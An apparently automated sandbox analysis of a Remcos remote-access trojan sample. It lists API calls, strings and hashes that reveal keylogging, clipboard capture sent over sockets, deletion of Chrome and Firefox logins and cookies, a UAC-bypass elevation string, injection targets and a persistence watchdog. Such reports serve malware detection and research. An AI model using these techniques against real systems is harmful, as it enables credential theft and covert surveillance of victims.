                        • OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 0041125A
                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: CloseOpen$CreateProcessValue$CurrentHandleLocalMutexQueryThreadTime
                        • String ID: 0DG$Remcos restarted by watchdog!$WDH$Watchdog launch failed!$Watchdog module activated$WinDir$\SysWOW64\$\system32\$fsutil.exe$rmclient.exe$svchost.exe$BG
                        • API String ID: 65172268-860466531
                        • Opcode ID: 3d2ec039f958bf048a8c201d7f8a81e9ba8d6979ff7f871c800e70ef052d4e82
                        • Instruction ID: cd90af3caa6d69ca3e9ea8718b5663318d6259183dea3b669bddfb6979e5fbe1
                        • Opcode Fuzzy Hash: 3d2ec039f958bf048a8c201d7f8a81e9ba8d6979ff7f871c800e70ef052d4e82
                        • Instruction Fuzzy Hash: 9F718E316042415BC614FB32D8579AE77A4AED4718F40053FF582A21F2EF7CAA49C69F
                        APIs
                        • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040B3B4
                        • FindClose.KERNEL32(00000000), ref: 0040B3CE
                        • FindNextFileA.KERNEL32(00000000,?), ref: 0040B4F1
                        • FindClose.KERNEL32(00000000), ref: 0040B517
                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: Find$CloseFile$FirstNext
                        • String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
                        • API String ID: 1164774033-3681987949
                        • Opcode ID: a55c21d547313303409bc2568ceb902046709c86c763491b0c53e4f2ca284d26
                        • Instruction ID: 6ff196721abdd8e0f3db8d3f3c96df629808f1f9148939b99990ee587e15bfec
                        • Opcode Fuzzy Hash: a55c21d547313303409bc2568ceb902046709c86c763491b0c53e4f2ca284d26
                        • Instruction Fuzzy Hash: 31512C319042195ADB14FBA1EC96AEE7768EF50318F50007FF805B31E2EF389A45CA9D
                        APIs
                        • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040B5B2
                        • FindClose.KERNEL32(00000000), ref: 0040B5CC
                        • FindNextFileA.KERNEL32(00000000,?), ref: 0040B68C
                        • FindClose.KERNEL32(00000000), ref: 0040B6B2
                        • FindClose.KERNEL32(00000000), ref: 0040B6D1
                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: Find$Close$File$FirstNext
                        • String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
                        • API String ID: 3527384056-432212279
                        • Opcode ID: a71f50fce03a6b89e47498d88d246ee68c23d58d563221132017ac6cdd0e80fc
                        • Instruction ID: 007be0ece90fca0e9f39ea1f272cf2b8da877aadfcc1370f70eac597690c30d9
                        • Opcode Fuzzy Hash: a71f50fce03a6b89e47498d88d246ee68c23d58d563221132017ac6cdd0e80fc
                        • Instruction Fuzzy Hash: A7414B319042196ACB14F7A1EC569EE7768EF21318F50017FF801B31E2EF399A45CA9E
                        APIs
                        • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,?,?,00474358), ref: 0040E233
                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,00474358), ref: 0040E25E
                        • Process32FirstW.KERNEL32(00000000,0000022C), ref: 0040E27A
                        • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040E2FD
                        • CloseHandle.KERNEL32(00000000,?,?,00474358), ref: 0040E30C
                          • Part of subcall function 004127D5: RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 004127E3
                          • Part of subcall function 004127D5: RegSetValueExA.KERNELBASE(TUF,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 004127FE
                          • Part of subcall function 004127D5: RegCloseKey.ADVAPI32(?,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 00412809
                        • CloseHandle.KERNEL32(00000000,?,?,00474358), ref: 0040E371
                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: Close$CreateHandleProcess32$FileFirstModuleNameNextSnapshotToolhelp32Value
                        • String ID: C:\Program Files(x86)\Internet Explorer\$Inj$ieinstal.exe$ielowutil.exe$BG
                        • API String ID: 726551946-3025026198
                        • Opcode ID: 30da1d47b11118a268f62bc142a88eb8f37d6f01f4d3dd7acdbf78fe8c56f144
                        • Instruction ID: ff5f769c9d2eb9d60ee5c92f3007ac3329fe223f24fa54890becbfeace6a8f7f
                        • Opcode Fuzzy Hash: 30da1d47b11118a268f62bc142a88eb8f37d6f01f4d3dd7acdbf78fe8c56f144
                        • Instruction Fuzzy Hash: 647182311083019BC714FB61D8519EF77A5BF91358F400D3EF986631E2EF38A919CA9A
                        APIs
                        • OpenClipboard.USER32 ref: 004159C7
                        • EmptyClipboard.USER32 ref: 004159D5
                        • GlobalAlloc.KERNEL32(00002000,-00000002), ref: 004159F5
                        • GlobalLock.KERNEL32(00000000), ref: 004159FE
                        • GlobalUnlock.KERNEL32(00000000), ref: 00415A34
                        • SetClipboardData.USER32(0000000D,00000000), ref: 00415A3D
                        • CloseClipboard.USER32 ref: 00415A5A
                        • OpenClipboard.USER32 ref: 00415A61
                        • GetClipboardData.USER32(0000000D), ref: 00415A71
                        • GlobalLock.KERNEL32(00000000), ref: 00415A7A
                        • GlobalUnlock.KERNEL32(00000000), ref: 00415A83
                        • CloseClipboard.USER32 ref: 00415A89
                          • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: Clipboard$Global$CloseDataLockOpenUnlock$AllocEmptysend
                        • String ID:
                        • API String ID: 3520204547-0
                        • Opcode ID: 6ed8a15f85b4eda99e75bc68e9c644e8b427782961166fcaf36fdd4c8f2d64f9
                        • Instruction ID: 65deba99f03779ab530566add8b8501f772d12743f07501a5a0e0bdfe921cf26
                        • Opcode Fuzzy Hash: 6ed8a15f85b4eda99e75bc68e9c644e8b427782961166fcaf36fdd4c8f2d64f9
                        • Instruction Fuzzy Hash: 232183712043009BC714BBB1EC5AAAE76A9AF80752F00453EFD06961E2EF38C845D66A
                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: 0$1$2$3$4$5$6$7
                        • API String ID: 0-3177665633
                        • Opcode ID: aa35b6c391b669857e709787408fc35d19a5eec55d3d5a0aced25700c68607bb
                        • Instruction ID: 8a7243103da74f60d5bbefacb9012cb64624b509857c51ebf6f1776beea37390
                        • Opcode Fuzzy Hash: aa35b6c391b669857e709787408fc35d19a5eec55d3d5a0aced25700c68607bb
                        • Instruction Fuzzy Hash: EE61B470508301AEDB00EF21C862FEE77E4AF95754F40485EF591672E2DB78AA48C797
                        APIs
                        • GetForegroundWindow.USER32 ref: 00409B3F
                        • GetWindowThreadProcessId.USER32(00000000,?), ref: 00409B4B
                        • GetKeyboardLayout.USER32(00000000), ref: 00409B52
                        • GetKeyState.USER32(00000010), ref: 00409B5C
                        • GetKeyboardState.USER32(?), ref: 00409B67
                        • ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 00409B8A
                        • ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 00409BE3
                        • ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 00409C1C
                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: Unicode$KeyboardStateWindow$ForegroundLayoutProcessThread
                        • String ID: X[G
                        • API String ID: 1888522110-739899062
                        • Opcode ID: e493efd0b8b4558b132da8245606e3aa1f2ec85b30bd84d249f064ae8ad69455
                        • Instruction ID: b3d75429b008435a5e1dd269aa2dc422b6d7dab2ccd5499d38c457950c038251
                        • Opcode Fuzzy Hash: e493efd0b8b4558b132da8245606e3aa1f2ec85b30bd84d249f064ae8ad69455
                        • Instruction Fuzzy Hash: 7C318F72544308AFE700DF90EC45FDBBBECEB48715F00083ABA45961A1D7B5E948DBA6
                        APIs
                        • _wcslen.LIBCMT ref: 00406788
                        • CoGetObject.OLE32(?,00000024,004659B0,00000000), ref: 004067E9
                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: Object_wcslen
                        • String ID: $$Elevation:Administrator!new:$[+] CoGetObject$[+] CoGetObject SUCCESS$[+] ucmAllocateElevatedObject$[-] CoGetObject FAILURE${3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                        • API String ID: 240030777-3166923314
                        • Opcode ID: fb4b37c01a82ea3e6f4d6ea97501aa73dd573a9fa8d004a292a27325ecfbba87
                        • Instruction ID: 8131e8b3f96e11b5c9c7103c6ecb9350ac77814929071503a065d606a7b617cc
                        • Opcode Fuzzy Hash: fb4b37c01a82ea3e6f4d6ea97501aa73dd573a9fa8d004a292a27325ecfbba87
                        • Instruction Fuzzy Hash: A11170B2901118AEDB10FAA58849A9EB7BCDB48714F55007BE905F3281E77C9A148A7D
                        APIs
                        • OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,00474918), ref: 004198E8
                        • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,?,?), ref: 00419937
                        • GetLastError.KERNEL32 ref: 00419945
                        • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,?,?), ref: 0041997D
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: EnumServicesStatus$ErrorLastManagerOpen
                        • String ID:
                        • API String ID: 3587775597-0
                        • Opcode ID: 3ac6ab5d256872219fc595c736f1fa07358be726c92bd725a469ceb362d7fbf0
                        • Instruction ID: 19b9a1677c56063b65225fc9a0f34bb07ffc83518ef4baa2b379b487d5559ddd
                        • Opcode Fuzzy Hash: 3ac6ab5d256872219fc595c736f1fa07358be726c92bd725a469ceb362d7fbf0
                        • Instruction Fuzzy Hash: 84813F711083049BC714FB21DC959AFB7A8BF94718F50493EF582521E2EF78EA05CB9A
                        APIs
                        • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B499
                        • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B4CB
                        • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B539
                        • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B546
                          • Part of subcall function 0041B43F: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B51C
                        • FindClose.KERNEL32(00000000,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B571
                        • RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B578
                        • GetLastError.KERNEL32(?,?,?,?,?,?,004742E0,004742F8), ref: 0041B580
                        • FindClose.KERNEL32(00000000,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B593
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
                        • String ID:
                        • API String ID: 2341273852-0
                        • Opcode ID: 0297631c5ee8ecb1d1a4c9aeac50dc6e63fd93f3a2d20230b54752594d88c721
                        • Instruction ID: 0b65015344b940e71c8db0708908b2546b6e9c6134e65c3d42cb3d4753665141
                        • Opcode Fuzzy Hash: 0297631c5ee8ecb1d1a4c9aeac50dc6e63fd93f3a2d20230b54752594d88c721
                        • Instruction Fuzzy Hash: 4D31937180921C6ACB20D771AC49FDA77BCAF08304F4405EBF505D3182EB799AC4CA69
                        APIs
                        • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 00409A01
                        • SetWindowsHookExA.USER32(0000000D,004099D0,00000000), ref: 00409A0F
                        • GetLastError.KERNEL32 ref: 00409A1B
                          • Part of subcall function 0041A696: GetLocalTime.KERNEL32(00000000), ref: 0041A6B0
                        • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 00409A6B
                        • TranslateMessage.USER32(?), ref: 00409A7A
                        • DispatchMessageA.USER32(?), ref: 00409A85
                        Strings
                        • Keylogger initialization failure: error , xrefs: 00409A32
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: Message$DispatchErrorHandleHookLastLocalModuleTimeTranslateWindows
                        • String ID: Keylogger initialization failure: error
                        • API String ID: 3219506041-952744263
                        • Opcode ID: 0b7731a1732448719b2bf699768c997a41862952e5444ada4ba6697cad37b533
                        • Instruction ID: 51093fa3456b5fa5e68b97b38f4420b838fb12217e42543f2b1c539fb4fc9beb
                        • Opcode Fuzzy Hash: 0b7731a1732448719b2bf699768c997a41862952e5444ada4ba6697cad37b533
                        • Instruction Fuzzy Hash: 281194716043015FC710AB7AAC4996B77ECAB94B15B10057FFC45D2291FB34DE01CBAA
                        APIs
                        • RegCreateKeyExW.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,00000000,00000001), ref: 0041301A
                        • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000000,00000001), ref: 00413026
                          • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                        • LoadLibraryA.KERNEL32(Shlwapi.dll,SHDeleteKeyW,00000000,00000001), ref: 004131ED
                        • GetProcAddress.KERNEL32(00000000), ref: 004131F4
                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: AddressCloseCreateLibraryLoadProcsend
                        • String ID: SHDeleteKeyW$Shlwapi.dll
                        • API String ID: 2127411465-314212984
                        • Opcode ID: b8065b9836623536c08516bc274bfd8a167c6865f6e9b73682af5f29f8a9cf8d
                        • Instruction ID: 77d0e0f665ec2cae06f71cdba8331079b705a8b2343c1238c9795aa136ea70b2
                        • Opcode Fuzzy Hash: b8065b9836623536c08516bc274bfd8a167c6865f6e9b73682af5f29f8a9cf8d
                        • Instruction Fuzzy Hash: 0AB1B571A043006BC614BA75CC979BE76989F94718F40063FF946B31E2EF7C9A4486DB
                        APIs
                        • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Login Data), ref: 0040B257
                        • GetLastError.KERNEL32 ref: 0040B261
                        Strings
                        • \AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 0040B222
                        • [Chrome StoredLogins not found], xrefs: 0040B27B
                        • UserProfile, xrefs: 0040B227
                        • [Chrome StoredLogins found, cleared!], xrefs: 0040B287
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: DeleteErrorFileLast
                        • String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
                        • API String ID: 2018770650-1062637481
                        • Opcode ID: c40f0bbe6ac281c9bc18074575bfe4029dca0a9d2103736dcf0ec681c75a3121
                        • Instruction ID: b4925b9b145212f78872d6bf605c5cdf000d45b1535ad2fa459343da0bf9ff5a
                        • Opcode Fuzzy Hash: c40f0bbe6ac281c9bc18074575bfe4029dca0a9d2103736dcf0ec681c75a3121
                        • Instruction Fuzzy Hash: 8C01623168410597CA0577B5ED6F8AE3624E921718F50017FF802731E6FF7A9A0586DE
                        APIs
                        • GetCurrentProcess.KERNEL32(00000028,?), ref: 00416AC4
                        • OpenProcessToken.ADVAPI32(00000000), ref: 00416ACB
                        • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00416ADD
                        • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00416AFC
                        • GetLastError.KERNEL32 ref: 00416B02
                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                        • String ID: SeShutdownPrivilege
                        • API String ID: 3534403312-3733053543
                        • Opcode ID: e04eb0b34037921419aad719b93aaa051d7dc20f4e189cf25d4eb9764effedfd
                        • Instruction ID: c28276ca820f5d67da4083ad645d4fedab17ddc29f560671af9b7c8b6b4fa774
                        • Opcode Fuzzy Hash: e04eb0b34037921419aad719b93aaa051d7dc20f4e189cf25d4eb9764effedfd
                        • Instruction Fuzzy Hash: 25F0D4B5805229BBDB10ABA1EC4DEEF7EBCEF05656F100061B805E2192D6748A44CAB5
                        APIs
                        • __EH_prolog.LIBCMT ref: 004089AE
                          • Part of subcall function 004041F1: socket.WS2_32(?,00000001,00000006), ref: 00404212
                          • Part of subcall function 0040428C: connect.WS2_32(?,?,?), ref: 004042A5
                        • FindFirstFileW.KERNEL32(00000000,?,?,?,00000064), ref: 00408A8D
                        • FindNextFileW.KERNEL32(00000000,?), ref: 00408AE0
                        • FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 00408AF7
                          • Part of subcall function 00404468: WaitForSingleObject.KERNEL32(?,00000000,00401943,?,?,00000004,?,?,00000004,00475B90,00473EE8,00000000), ref: 0040450E
                          • Part of subcall function 00404468: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,00475B90,00473EE8,00000000,?,?,?,?,?,00401943), ref: 0040453C
                          • Part of subcall function 004047EB: WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 004047FD
                          • Part of subcall function 004047EB: SetEvent.KERNEL32(?,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 00404808
                          • Part of subcall function 004047EB: CloseHandle.KERNEL32(?,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 00404811
                        • __CxxThrowException@8.LIBVCRUNTIME ref: 00408DA1
                          • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: Find$CloseEventFileObjectSingleWait$Exception@8FirstH_prologHandleNextThrowconnectsendsocket
                        • String ID:
                        • API String ID: 4043647387-0
                        • Opcode ID: 960b8c1e0533c2719e906e86d7f414d90c0ed0de55d0b27db29086ff58eb8dfa
                        • Instruction ID: 093ddd6807f9b365337d5cb0cb3505b04edbc5c9b0fee964739ae84c01535933
                        • Opcode Fuzzy Hash: 960b8c1e0533c2719e906e86d7f414d90c0ed0de55d0b27db29086ff58eb8dfa
                        • Instruction Fuzzy Hash: 50A15C729001089ACB14EBA1DD92AEDB778AF54318F10427FF506B71D2EF385E498B98
                        APIs
                        • OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,?,?,0041982A,00000000,00000000), ref: 00419BDD
                        • OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,?,0041982A,00000000,00000000), ref: 00419BF2
                        • CloseServiceHandle.ADVAPI32(00000000,?,?,0041982A,00000000,00000000), ref: 00419BFF
                        • StartServiceW.ADVAPI32(00000000,00000000,00000000,?,?,0041982A,00000000,00000000), ref: 00419C0A
                        • CloseServiceHandle.ADVAPI32(00000000,?,?,0041982A,00000000,00000000), ref: 00419C1C
                        • CloseServiceHandle.ADVAPI32(00000000,?,?,0041982A,00000000,00000000), ref: 00419C1F
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: Service$CloseHandle$Open$ManagerStart
                        • String ID:
                        • API String ID: 276877138-0
                        • Opcode ID: e25c39d92a846a462b53c10185a272e0ad60f5790e3d5b6c3523f631f015873d
                        • Instruction ID: 029754fb73528063a62336f1848e5bb122dc48601db67947cc2268dfcf3d9ab0
                        • Opcode Fuzzy Hash: e25c39d92a846a462b53c10185a272e0ad60f5790e3d5b6c3523f631f015873d
                        • Instruction Fuzzy Hash: 2EF089755053146FD2115B31FC88DBF2AECEF85BA6B00043AF54193191DB68CD4595F5
                        APIs
                        • FindFirstFileW.KERNEL32(00000000,?), ref: 00418ECF
                        • FindNextFileW.KERNEL32(00000000,?,?), ref: 00418F9B
                          • Part of subcall function 0041B62A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B643
                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: File$Find$CreateFirstNext
                        • String ID: @CG$XCG$>G
                        • API String ID: 341183262-3030817687
                        • Opcode ID: 232651b6631de9661e01008884487fa2ba37f4a7870c2f2a45051fa367f78adf
                        • Instruction ID: 4fcfe6ad4d4b9cbb37a9178feb6c4e4542e518df657a804f5f9e1d603b628f73
                        • Opcode Fuzzy Hash: 232651b6631de9661e01008884487fa2ba37f4a7870c2f2a45051fa367f78adf
                        • Instruction Fuzzy Hash: 408153315042405BC314FB61C892EEF73A9AFD1718F50493FF946671E2EF389A49C69A
                        APIs
                          • Part of subcall function 00416AB7: GetCurrentProcess.KERNEL32(00000028,?), ref: 00416AC4
                          • Part of subcall function 00416AB7: OpenProcessToken.ADVAPI32(00000000), ref: 00416ACB
                          • Part of subcall function 00416AB7: LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00416ADD
                          • Part of subcall function 00416AB7: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00416AFC
                          • Part of subcall function 00416AB7: GetLastError.KERNEL32 ref: 00416B02
                        • ExitWindowsEx.USER32(00000000,00000001), ref: 0041595B
                        • LoadLibraryA.KERNEL32(PowrProf.dll,SetSuspendState,00000000,00000000,00000000), ref: 00415970
                        • GetProcAddress.KERNEL32(00000000), ref: 00415977
                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: ProcessToken$AddressAdjustCurrentErrorExitLastLibraryLoadLookupOpenPrivilegePrivilegesProcValueWindows
                        • String ID: PowrProf.dll$SetSuspendState
                        • API String ID: 1589313981-1420736420
                        • Opcode ID: ddda36ebdef431690859fd105a934bc1752b124657cc9f8586ecd1fce7ea85c4
                        • Instruction ID: a9af72b6b9eaf8561cd509fc4cf8b1c610007ddf0d7e7dc7bbe2947ee761077a
                        • Opcode Fuzzy Hash: ddda36ebdef431690859fd105a934bc1752b124657cc9f8586ecd1fce7ea85c4
                        • Instruction Fuzzy Hash: B22161B0604741E6CA14F7B19856AFF225A9F80748F40883FB402A71D2EF7CDC89865F
                        APIs
                        • GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,00451512,?,00000000), ref: 0045128C
                        • GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,00451512,?,00000000), ref: 004512B5
                        • GetACP.KERNEL32(?,?,00451512,?,00000000), ref: 004512CA
                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: InfoLocale
                        • String ID: ACP$OCP
                        • API String ID: 2299586839-711371036
                        • Opcode ID: 3e26eff85c0b030be7827b2fbb91fc7191fc27f2fce1bf15d40cdf94764cc661
                        • Instruction ID: c7787d6075dc192170befbe1ddc6ff7be643600d5f5c624e054d22ce072cfab5
                        • Opcode Fuzzy Hash: 3e26eff85c0b030be7827b2fbb91fc7191fc27f2fce1bf15d40cdf94764cc661
                        • Instruction Fuzzy Hash: 9621C432A00100A7DB348F55C900B9773A6AF54B66F5685E6FC09F7232E73ADD49C399
                        APIs
                        • FindResourceA.KERNEL32(SETTINGS,0000000A,00000000), ref: 0041A660
                        • LoadResource.KERNEL32(00000000,?,?,0040E183,00000000), ref: 0041A674
                        • LockResource.KERNEL32(00000000,?,?,0040E183,00000000), ref: 0041A67B
                        • SizeofResource.KERNEL32(00000000,?,?,0040E183,00000000), ref: 0041A68A
                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: Resource$FindLoadLockSizeof
                        • String ID: SETTINGS
                        • API String ID: 3473537107-594951305
                        • Opcode ID: e32b0715ad7aadeb38a8c4a618404dc1e86643bbbf9351d1ef3d996740a46f90
                        • Instruction ID: 54a99f42213d160abf76577abca5e20a835261b5cb21c96a6540e7550e34f59b
                        • Opcode Fuzzy Hash: e32b0715ad7aadeb38a8c4a618404dc1e86643bbbf9351d1ef3d996740a46f90
                        • Instruction Fuzzy Hash: F3E09A7A604710ABCB211BA5BC8CD477E39E786763714403AF90592331DA359850DA59
                        APIs
                          • Part of subcall function 00446ECF: GetLastError.KERNEL32(?,0043E270,0043932C,0043E270,?,?,0043B965,FF8BC35D), ref: 00446ED3
                          • Part of subcall function 00446ECF: _free.LIBCMT ref: 00446F06
                          • Part of subcall function 00446ECF: SetLastError.KERNEL32(00000000,FF8BC35D), ref: 00446F47
                          • Part of subcall function 00446ECF: _abort.LIBCMT ref: 00446F4D
                          • Part of subcall function 00446ECF: _free.LIBCMT ref: 00446F2E
                          • Part of subcall function 00446ECF: SetLastError.KERNEL32(00000000,FF8BC35D), ref: 00446F3B
                        • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 004514D3
                        • IsValidCodePage.KERNEL32(00000000), ref: 0045152E
                        • IsValidLocale.KERNEL32(?,00000001), ref: 0045153D
